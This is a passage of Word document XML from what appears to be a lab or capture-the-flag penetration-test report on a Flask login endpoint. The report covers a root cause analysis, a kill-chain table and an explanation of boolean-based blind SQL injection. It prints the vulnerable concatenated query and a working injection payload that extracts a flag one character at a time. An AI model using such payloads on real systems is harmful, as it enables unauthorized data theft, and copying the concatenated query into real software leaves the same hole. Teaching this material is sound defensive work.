            <w:tcW w:w="5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4932168" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>denial of service</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> capability demonstrated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7ABC5EAD" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="2788FD8C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Root Cause Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D73B083" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>The Flask login endpoint builds its SQL query by directly concatenating user-supplied input into a string. The vulnerable pattern from app.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A476475" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># VULNERABLE — string concatenation, no parameterization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE5D8A9" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">query = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f"SELECT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> * FROM users WHERE username </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>= '{username}'</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> AND password </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>= '{password}'</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB5A469" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">result = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>db.execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367121E4" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">The application provides only two distinct HTTP responses — a welcome message on success and an error on failure — with no direct data output. This is the classic 'blind' condition: the attacker cannot see query results but can infer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve"> true/false from the response. The secrets table (defined in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>init.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>) holds the flag and is never accessed by normal application logic — it exists purely as hidden data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2E0830" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>init.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59FCE38A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE TABLE secrets (id INT AUTO_INCREMENT PRIMARY KEY, flag </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VARCHAR(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>200));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B2179F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSERT INTO secrets (id, flag) VALUES (1, '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FLAG{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>blind_sqli_char_by_char_exfil_success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C411D95" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="5918A968" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.4 Kill Chain &amp; Exploitation Walkthrough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E13696" w14:paraId="3A673174" w14:textId="77777777">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227D12D" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Kill Chain Phase</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C906F61" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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C0DD9BD" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="456DC48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E10A7B" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reconnaissance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5BD446" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1190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EB2EC3" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker visits http://localhost:5002 and finds a login form</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="4AE4E175"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F1A73FF" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Weaponization</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4E0D381" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1059</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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01EDBD9" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Crafts </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-based payloads using </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SUBSTR(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">) and </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ORD(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>) functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="53F16AF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AA263C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Delivery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89B8BF" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1190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812EEA" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Injects payload into username field via HTTP POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="0A4B35B2"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FA1B37D" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitation</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296FB055" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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CCC7257" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Binary search on ASCII values extracts flag character by character</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="360CCDC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57A916" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Actions on Objective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FE660A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1005</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9D7E8D" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Complete flag string assembled from 43 individual character extractions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="243FFE93" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="461623B8" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>How Boolean-Based Blind Injection Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A652D46" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Because the server only returns true or false (Welcome back / Invalid credentials), the attacker asks yes/no questions about the hidden data. The key insight is that the injection closes the original query and adds an OR condition the attacker controls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7686B1B0" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' OR (SELECT ORD(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SUBSTR(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>flag,1,1)) FROM secrets LIMIT 1) &lt;= 70 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285BB648" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="616CC00C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241068AC" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--  '</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         closes the username string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248C5FEF" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--  OR</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        adds attacker-controlled condition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3849184F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--  ORD()   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  converts character to ASCII number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67366949" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--  SUBSTR()  extracts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> one character at a given position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D720683" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--  &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>= 70     yes/no question: is the ASCII value &lt;= 70?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A70A623" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--  --</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -      comments out the rest of the original query</w:t>
      </w:r>
    </w:p>
